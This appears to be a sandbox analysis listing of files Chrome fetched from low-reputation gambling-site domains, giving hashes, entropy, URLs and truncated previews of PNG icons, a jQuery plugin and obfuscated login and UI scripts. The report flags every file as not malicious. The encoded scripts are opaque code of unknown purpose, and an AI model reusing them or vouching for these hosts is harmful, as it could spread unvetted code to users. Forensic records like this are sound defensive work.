                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BC4F1C158D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BC4F1C148D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1508), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1508
                                                                                                                                                          Entropy (8bit):5.8012686077032365
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:V/IuRx4iKI/YOkStcE47QfKFAvgEf+qjijnrmhcRch2nRs:V/Rx4pI/zkSt0kS4glqjMnrmwchJ
                                                                                                                                                          MD5:71F1D2A1B8A7E16EA382FA2A18961662
                                                                                                                                                          SHA1:90A19705EE1B2854B4C2901A3103B0961966A0B9
                                                                                                                                                          SHA-256:F7205AEC396A6156872A52FF89822817285224424505F1A7A9251243CC91C827
                                                                                                                                                          SHA-512:E61F2B64E12262AC2135E863C20783216407440014DE8EBB2204E9F5CB75883E6A03D9620D18A9C15F6C1037698273A0D6D1E6EC0CF341CF112CD363B967D305
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/alertBox.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtALAZnwF0AaAbwCIBGAJwFUBpCgLgDMBXNGAFwEt1MUEkhLcAlJXZIQAAiTcavHhQDcAeTAArEDwB0AExCteaEAAUaKCCBrcAnphEUA+s5BIAsin3sANiApyADcoX3YQZgBCAAYAXzEVEJoZEABebkwKABF9AA5gCjESNHTdNEwQIt50zIA5AE0ADzVCkhga7PYAegAmVpRUzHKxTDJYkg1tHkxeXQBbKAgPdm4oPnQkEbIYXxRpDyQAc2YYXQAJePJ9FHr3Nk4efmGybgALXiR5o7MoGig53RIV4oYCpSJUUTvT5zb6/f66GChXxgWBwABkaLeHy+hx+fwBiN8yNRmDEsUuw1G40mOgyswWEAA4iBuNwbJscBQYbi4XMKEQxEUyPo1lB7lx1s8aCz2DQ0GQPgAhXxQNBwKJUckkYBrGCvZiUbl4+FAkEsDgSp6CCRJOTpKEqKAY6TcAAqvDmIBQK0wFseAgkABJMgBiaCHEAeKBIOCFXQRjLRMQAfk+SpVarB0WYaaQytVcDBmpIPSoSa1nre3iQzEpYwmWlpM3mi2Wq0lHO2u32RxO50uwpudz9ktJLyhOONANNoPBkOxRt5CKRKPgGKx0Nh+OXRNXcFJ5KKMBQcwgKxA+lrpKpDamdJbTJZbJoHOwXK3/35gra0rWF/F/rPIeJA0KkZDSmghg0ABo42r8MhQPaHzCKkUC6IGMC/myACi/iemg3CiKhujONIvisCRMAAD5UUgKjStwspoDIGQUAoqpILwkqBGQawKDWZBoP8EQUKwUCGIEczeCJ3rcAAtCYFBatgaGLtuM7Jqx+i8EEPF8S+Bq8JeFChDY3CKigjRKeM2BaTpPHyGsSgAMIqkgNZctGsZtG5AlgBm6poemBbAWhzhBJkMitHZunkI5fAwK50YeaZthyQsik2TFDnti5vnMBQrwgOJNhKSQtmZEg0BoIEKkkRFF
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2401
                                                                                                                                                          Entropy (8bit):7.491652601095067
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:0AinNuijQeJ39cm+E0veEgEeSre0+1K42JkgUOID8KcVJIyG4GbP:yNyq1ZEgvKIaHVJIyG4uP
                                                                                                                                                          MD5:0E3F06E91941C96F4083D1E3D90FDF1D
                                                                                                                                                          SHA1:E4EC0428EBAEC848303C7487C2825771A9F5953C
                                                                                                                                                          SHA-256:1D234FE55D0DBCE915A70854A21F571F7D355EA7A8A36512772FA392F11C2302
                                                                                                                                                          SHA-512:9F67A78D04A8C480448016E6C975FBB9DFA3C8144DCB59368A68A04B796DCFC6907183BB247B66FF0B733CEFF1673655BFC9BA623F949ADD3C915AA552E03CBC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/game_fg.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:14393DBDA3A111E98C4BF8052F0E358A" xmpMM:InstanceID="xmp.iid:14393DBCA3A111E98C4BF8052F0E358A" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E3DAAB8FF77711E7B122FFEE1F631D5E" stRef:documentID="xmp.did:E3DAAB90F77711E7B122FFEE1F631D5E"/> </rdf:Description> </rdf:RDF> </x:xmpme
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 276 x 418, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):98341
                                                                                                                                                          Entropy (8bit):7.990962693333447
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:3072:TpWS3OdDdpUKvyZiNcwQ6tOagz1J3GxXISX2:TpbKMKvyImwQUgZJea
                                                                                                                                                          MD5:4470D4DDAF766D1EA6F8EDA5EBFC718E
                                                                                                                                                          SHA1:76CB1D8685CC98545002C88B00329D3D38105DBA
                                                                                                                                                          SHA-256:E7D8EA1DA678014AAD8FBA948E70F1CACED577679315C08D8331C5C2B7B8CC24
                                                                                                                                                          SHA-512:9BD9723D75774AC689BA597B8297496F59C797073803324F0AC313F894DF5F68A4C2A4983AAA6E25616C427B53A98932DC292CDD672D293DED985D118DC2F6C4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/app/02.png
                                                                                                                                                          Preview:.PNG........IHDR.............&.9... .IDATx^...]gu....N?g.hf$..,.-..r76`...&...s.&$..Q.@..@..s...@b.B..`.w.l..M.....>..3.p.y.d....s<.3{.Y........qBY`...c.^wmWW..l...`;..P.d.y.Z.{.~.....-p...H.n.=4$f.Q.>...'....t...R..8.d._y.9..n...+.....~M.t...4.x...^+.}r..eVE_...^....E\5..M.U.$.R......fg.TY.".v..W......9A...........X(.....;.c.wu.y.Y..(/.5...x.6.x.g...y.o_.x.).fs~bbl..{..m6L-.C...p..v..j..ry...D.JH.....i....vr.\-...Lww.l.....w....L..M..h..:..2Z.;.V......F..#..C..>4......I</.]X..V........,.P...$A.D.~.(. .<,.m..x.]........{.*%$.z.j...J...N...u.M7y/#.t>.qf.......o..MW......!......JY?t..>==.z.....#$.Y.<.Q..E.....p1.*....#.1.q......PD..t...`....<...$.......{.s.[/..w..L.....:.r........K.;W...K...z.$j......,..I..s.TUe....D.. ..8.|.+?;.UB.0@.....0.,..-t!.L.l.p.+...I.....'.5..?<3.r.x.r.m.u<.cxo......1Z.....l.|...KgffVT..h6<....".P@..D.2.'R.m.F.@..$K.4..$..h-.<.........Q........IH...M.g[H.*^s..B....o.'Y..o....}.g........s.....@9.w....J`.!.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 191 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):53447
                                                                                                                                                          Entropy (8bit):7.993730777959549
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:1536:E4C99xTuRKJnHFZg8NLdxGtWs+VWSsdeNr5v+ua7R:i99xT88/reWseeepm1
                                                                                                                                                          MD5:37F68C3A2DE0D413C056B2D8B948FF41
                                                                                                                                                          SHA1:3F22311A3EDAD209EB71B88FF2E96A80E25B3503
                                                                                                                                                          SHA-256:EB8345229FFA12B511A012DE3C41B87625585B46DFA9CF69EC359D8D7845E355
                                                                                                                                                          SHA-512:FCB4614B153E84BFCF12214AF2FB1CAD1EF444A49B1899C2F2BCE2538824040CFB52B48E06FA7262139CC969C013271777FDE07BC009622203624BE95DA54555
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/245/games/mg/mg_game_03.png
                                                                                                                                                          Preview:.PNG........IHDR.......x.....,e.]....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:9CA5A6357B7A11E899F4AB816A955158" xmpMM:DocumentID="xmp.did:9CA5A6367B7A11E899F4AB816A955158"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9CA5A6337B7A11E899F4AB816A955158" stRef:documentID="xmp.did:9CA5A6347B7A11E899F4AB816A955158"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.B.....7IDATx.L.W.e.y........7..A... .A..!....!...]...v..nt#....B...9$5..!@.0.......LV....v..[..I.Dw.pN......}..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (6952), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6952
                                                                                                                                                          Entropy (8bit):5.935481060402197
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:VHoKgUllkrwFe0bcm5lrL7Led1wiGS0fPV6GdQRJzItC:VHTgYkrS35lrL+d15GS0fP9QEC
                                                                                                                                                          MD5:E6C4446626077DB80222E2F7B50865F4
                                                                                                                                                          SHA1:1243F6753CF13F495C66B47A7C721435880AA891
                                                                                                                                                          SHA-256:0AC74840D38C480737183FE828F4543CB7AD8A16D6D6F0BCF9A43AAE2785D544
                                                                                                                                                          SHA-512:F42279F9B245E47620682243013C924C3A3B3E7F1C953C8C32C4BC548E3F30AB55B2A6F8014997CD5228B444457EA8A25BFF81210E1E54A5FAC3FE43F78BD3C2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/components/121/login.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAJlwF0AaAbwEEAzASwC0AuKgVzRgBcb1N2SQBKMgF8SAcwCaIAB5NWHLmh58SaQQCJmSEAAIk7AE40OagNwB5MACsQHAHQATELTQgACvpQQQ+9gE9MICRqAPrBIEgAsij2zAA2IGrkAG5QscwgDACEAAxC/CYp+tpQALyKagAi9gAcwGr8JEhltopQDTRlmGrZMBBU9SQonWoAcuJSZgP6JZhImPyYwiQW1hyYKLYAtlAQAOIg7OzeSAvYajRIADIoojRoiedIACr6vq6xUL4PWvpJRiAAVX0sQesRudwAkvYHmBUlA2Akgqx9CAoPYRihODBEWokGgAMoHThoUQPAAWUCQALQKLRESgNBBRAaZHsUHYUAA0iBfLI2JxuIIUexmPo0Np2GSLrY4DyANT0yW2fTw+woTbzIR5RrzRYiFY2djrLY7CLMDkCtAnRZadgAYR27BgFIhaCoKAYanxAFEnsE7RRXE87QAJCjBCEjABik21ZFEBxGIGAlzuGRY/IUPCFB1F4uCthAaHsSAA6jRJTxbDAPgAvWtBFwptP1EQcsB3RwyDPybjsQSFbQgEpnTTeKEPaBIJDAFD6aFBGCO51QO3RBJEEzCvMAWgAjJkSiUQLZO9IzFRswB+E9niaX/tyveetQiBPsF5vD6+ABC7DQfK9oo/ZkNuYqZJK0oXJ+7yfAAPnB+6HiOahgqIZjmg8Y76CMUCbDisAwCgrDsGoRCnsW54PvwIgViAmxPCgdp1rWgGWkoAhkO6+iYIOaAjqQpTZCYUAADzsLY8QkpKIlynK/BoLYECaGSmAAPTYBQO50EQam2Eceg8NgUDMleARXiEaieju9RyuwxnkewKDXKA+gOlo8wMPZJn5GB4ogBZP6RhUwRqHKimWCgdxdPU+koACEBeG5lIgJ5EVReUrYkHRDEoD+nZsVmIGDsOZxgP+1y3PcQTlWgUZzu+M
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 37 x 37, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):908
                                                                                                                                                          Entropy (8bit):7.682906425679346
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:j/69ZxnrheL2Uiu0k8jWw6RiNhEfz3PqOuxP:j/69btImVjEi3M41
                                                                                                                                                          MD5:FB2164CC7B5F4149419E90A1AAEE6060
                                                                                                                                                          SHA1:2594B3D528167108818694E7E22B50F6A5C13B00
                                                                                                                                                          SHA-256:B1535BEE053BDD839A43EB2464FB53929B8DB66794AAB170E297D26C934C6DA1
                                                                                                                                                          SHA-512:B955AAE6B208C458C3ECDB34E3D7BEC170AD9D5669DAE0B3695B0D6C7FFC42BB1EB9FE3575CA0FF91E406BB182D23C7ED379EA0E3119CD77E1D02AEB6823F713
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/button/icon_prom_n.png
                                                                                                                                                          Preview:.PNG........IHDR...%...%...... .....pHYs................>IDATX.....U..._.t$N4.`4...h...A.%..1b.... HP.?p.>..*..N0q.E. c.N..nTd....DM...;3]u]....t.=&....~.{...K...K{"LG8...G.2....G...O.GS.H..S........D...x.vE......I.E.5.%.f.-...hkD.!.H.a..&.... *\..s..l.X#...F.Us..+.>..D..h...G..h.-.hy,ZNU4...H.*.)^.JujI.)...~D.t.h.._.......DE.X45*.F./.N..jME.+......O...[....D3S......^.O. ....R.$..\.X.M8.....?..v?.m..]u.y..A.^..X7....c.oV......_.m.....Mu...m...kh..1......I.^.%y.sr....=W..{.6.k...G.....8S;..R|#.{R,?....^.U....:.#...h.c|.~W1.}..*N.m\X!V.=xR.Kq.we..8Y.C..q ...."...jO.}\;.C...|.K.......W.^)...^....,.!.Sg.L..7.\.[..2....>......3.......Q.;.......E..L.....W.=Z.v..CW.;..q{......Q.ga..{..u.....0S..8.....990......l.H}bg.">...u.....u....k.M..Z...........W...W..E.=.bm>...;z|.....C:..~\!6....H....Gg9...z.N.<n.!..w..y...E..|.24X.z.V.x?....z...k.....vq.2..*.....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (34888), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):34888
                                                                                                                                                          Entropy (8bit):5.980968634743434
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:CJtKVExV+YblDV3XQ2ftp3XyBEeAstLiv3rIs8qLDM4w4ov:HVEuYblDfjhkcb8oo4Fg
                                                                                                                                                          MD5:9ADE5E638AC25F3589817E3E2F3CB74C
                                                                                                                                                          SHA1:62E6016D419A3E4A5FC5A17DB8C79DBEF4DDBF4F
                                                                                                                                                          SHA-256:61DA4F7CA1099C1344F177742C485F1128AC6FE61BB8DAEBF320733BAB65372B
                                                                                                                                                          SHA-512:9EC7E31B4B579C72BF6D46F1632060C6A01814B926CB39D2FE72D98F00BF1940079148938F8A956BEABE78E783AAA6F693D9E93783C8FD5E62252E7FFF36658C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/layer.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgBYBWAXQBoBvAIgAYBhALwE9qAuAMwFc0YAXAJbpMIcn3ICAlJQBuUAE4ACJAF4aAOgD0fXADZa+TQBsozEPPUArJO2zVizBF2rlcATlwAOCtS198tABMgcam5lY2bHZoAI6acC7uuIQ+fgH4bqFmFta21AAyACIAcsCJHrSp2vjJhibZEXmeHMQAiuW0ulX+esRZ4blR1AAaABIAmgBaHYHdNQDsdWE5kXYAsgDKALbtrp5u3uS+1YF6/St5jDAAggDyifspR2mnnueNQ/jXXCgPbpXPE66TL1AarahgPgbQIPTxdQH+Gog5YfOx8YYwaZ7TyzBH4DK6d6DOwgAAeAHMAAoPeaHY7+Qg1IngwLEABinhpT3pRHmuGZeUCABMIAgaQCeYR5iFQRchvJGJpOXtdPDJfNCAKhkh8jAtg9dLjJZ5+bLUdQUMw3OMHsQ6WlCG5NWbidRAoxKTJbdyHW4+i7wVsANS6Iy2iVpYi0WhauwcSkwNYPQhqyO0N4BvJIAAWfDQyaNkeSseoWwAkghCg98PbqsQAiWULpRtnqz660zM0NWmWIL89gE5sRCKaUa6AKrXSlsh6BVN1xklkNcYizwsL51j8EbGBcCAPLxDw2NkAQABKB/b/mIbkJXbsumujHze1wuCHBxL2YAKowhQ9aHmOZ9HmEt5AEDZVz2AxgJHJcjGARhEnmNw3GA4hRwaV0EEmSYElcFCyDxXRiBlLc8l0ABxGQxQIjxgN0UD72oDh8HkDhkM8IDiPmf1yPlEBaAAIU4/BgJQktiDLRgwwIlDgM8PisPBAA1IVNBnOSiJ5XRPAzfi7EsUZRig3B5j5OY+SUsE8nHNZcF2MzGMs/QSzZJAAHV/wI3QxLxeZdEwmyhkIARcBsAib0sxYS10Yo4DKSLtLSczN2UvJJkINkYGQjDousuU7FuZgIG8sypWi5F0qGYYuGGEBk
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (64577)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):64651
                                                                                                                                                          Entropy (8bit):5.185204590729394
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:CwJl9VwAdGuMbJVAOi9ee9RjOEe1sdMv5rjITry:Cxb7AdRjOEKhHay
                                                                                                                                                          MD5:B5BC8CD626B389BDE727A91E6CE79436
                                                                                                                                                          SHA1:3DF6C39300AC286CF596B3BDA273CB39FF825429
                                                                                                                                                          SHA-256:A1EB48EEB3B3F2BA41940D3041464F0B386B7A7C4A8ACB42F3017E691F4B116E
                                                                                                                                                          SHA-512:2C1DDE58CE83D9B716919DFC42602AEF3022BE012B3F92E61B17B674303ECBF0B9D308064B6D6C2443CF3E3DFD36BFB332EAB62E64B56BEF0BE801E6F4610F12
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/ftl/commonPage/js/jquery/jquery.nicescroll.min.js
                                                                                                                                                          Preview:/* nicescroll v3.7.0 InuYaksa - MIT - http://nicescroll.areaaperta.com */.!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?module.exports=e(require("jquery")):e(jQuery)}(function(e){"use strict";var o=!1,t=!1,r=0,i=2e3,n=0,s=e,l=function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||!1}(),a=function(){return window.cancelAnimationFrame||window.webkitCancelAnimationFrame||window.mozCancelAnimationFrame||!1}();l?window.cancelAnimationFrame||(a=function(e){}):(l=function(e,o){var t=(new Date).getTime(),r=Math.max(0,16-(t-lastTime)),i=window.setTimeout(function(){e(t+r)},r);return lastTime=t+r,i},a=function(e){window.clearTimeout(e)});var c=window.MutationObserver||window.WebKitMutationObserver||!1,d={zindex:"auto",cursoropacitymin:0,cursoropacitymax:1,cursorcolor:"#424242",cursorwidth:"6px",cursorborder:"1px solid #fff",cursorborderradius:"5px",scrollspeed:60,mousescrollstep:24,to
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 16 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):695
                                                                                                                                                          Entropy (8bit):7.599421362605412
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:6v/7apj/RwfGcf8OJGUjwrqeDOSLakFoqTVYR+YzNKytRZ+5x1ebbXM:j/RwZ0vXrqeFLakLS7zNKybQv1MbXM
                                                                                                                                                          MD5:2367DC507B682ADCC1960706F1E19305
                                                                                                                                                          SHA1:278DACF2EC6B336AD2544A4BF3346A8732496500
                                                                                                                                                          SHA-256:85B6251FCAC81DC49726E03C47FDC5FB9C06E3B9149033C60C772E9E510DD3A8
                                                                                                                                                          SHA-512:4E5D7DE93483D7BAC76EEC61BBF9E6C80F2FCA4E9677FE43CF1E4098DED2CC9CD3B45D019310AA83CEDDC21B58773556B7EA29B2564253A96332755D0205903E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/index/121/member/icon_forgot_n.png
                                                                                                                                                          Preview:.PNG........IHDR....... ............~IDATH...IhTA.......L..1....(.E..%..A.+.xpA..C....(x.b<......b...'O.$..!..0.q)....m..?.....P..$.S`.0.(.&.....!...W...T...O.*....n........s|-..x...6.........c...L.0...@)a.....1K6.J..pF.[$....6-Ee.T.<.$9K....P..G...W.....8._(.$.........~._...G]...|.t;....w.t......z.=.W.....}.b.;X.F...!.s.kj.5Y..G.../E.......f..?.FI..V.2...8[dS....u.qF...2.g..b.m..E.<Ui\S..{./.;.4.Y......3.....\wU.I]Fh4.;fv..J.a,..1......|.....!zT....nf....f.]RN..f...k...........{...x.p.....(a.'...o....^.9.......$.q...].3..Q.?ww.s.G...7.9.l....aD...6I...E=].9....v.m.H.......G......,..f.....G+;.nS.....<...M.........d..gO.&.Y....s.N..Wg...N...........IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 155 x 155, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):44921
                                                                                                                                                          Entropy (8bit):7.9899108745753455
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:q1dZvdthNWPN7rYhroyNAjE5uwce+WxNpJaEsKIspEc9hR0X3lS9a2l:q1nzhOvY1oyN6E5pHkVKIsqyhWXVol
                                                                                                                                                          MD5:EABEFC7519CDE537005FF76DA350D649
                                                                                                                                                          SHA1:DC396BB7A311B37BACF036B51A27435EDA060230
                                                                                                                                                          SHA-256:2779C3209EDB3A5B918941FB6E881DDE64CF584DBB1A4C6FFD2C2CE07BBA7AC6
                                                                                                                                                          SHA-512:E0B8075B311654E09548735DDB665AEA7394FBBF727CC5B149DB810CEFD3BFB3C1D65A766CCCADED025491E78D37EDB7088269470EB78D3866044472EA5078CB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/sports/e.png
                                                                                                                                                          Preview:.PNG........IHDR.............ua.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:702434ABCDEB11E99A67CCA56C2E3EC2" xmpMM:DocumentID="xmp.did:702434ACCDEB11E99A67CCA56C2E3EC2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:702434A9CDEB11E99A67CCA56C2E3EC2" stRef:documentID="xmp.did:702434AACDEB11E99A67CCA56C2E3EC2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..sX....IDATx....\.u6|n.^..I..K.!0.Sm0`06nq.mp...N.~.?...Kb.~..&.........@B ..z...2}....=..;.]....i...2..;...s..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 78 x 34, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3564
                                                                                                                                                          Entropy (8bit):7.780617932233728
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:72yWTD5G2DJCiN0HmNqWBoOXQLSaXl3BH:45AiEm4W85lZ
                                                                                                                                                          MD5:CCDDC0345203E7ADBE16D6613FD62EF1
                                                                                                                                                          SHA1:4E042BC37398A1E6DC0BE64074B013F58FD85AFF
                                                                                                                                                          SHA-256:5D907B8E4D9CFF99CEC071CB0516246EDBE0E3A101FBDDDC22E9BBF484A32A89
                                                                                                                                                          SHA-512:7D353A731F587E030E1614E0A45252B73EDCD33BC0E40A9F1EE43142759F91E8AD489B7519DA4D0CCC3774BE526E8D25085FA6F6C9E15A5591806D7695F9C9CA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/245/games/bbin/bbin.png
                                                                                                                                                          Preview:.PNG........IHDR...N...".......<....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:D0F8AD0F7B7A11E89DB0E9DB09C8A4A4" xmpMM:DocumentID="xmp.did:D0F8AD107B7A11E89DB0E9DB09C8A4A4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D0F8AD0D7B7A11E89DB0E9DB09C8A4A4" stRef:documentID="xmp.did:D0F8AD0E7B7A11E89DB0E9DB09C8A4A4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..2...\IDATx.Zkl.W..;;.~'N..Qb.'.6N..iE.4.B.P.....@......?.@.H<... $HC..#m)..G..!-J...E!..4.M..W..]{g..y.x.g..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 140 x 144, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):43964
                                                                                                                                                          Entropy (8bit):7.9904992398227375
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:L6pQJ/SZ4Nr40bLKt7hN2rcU9/4jaDJI0NgCqabh2H3gsrGkVmkY:L6OJ6ZWr4gLu7hNkcU9bNtqK+rGvZ
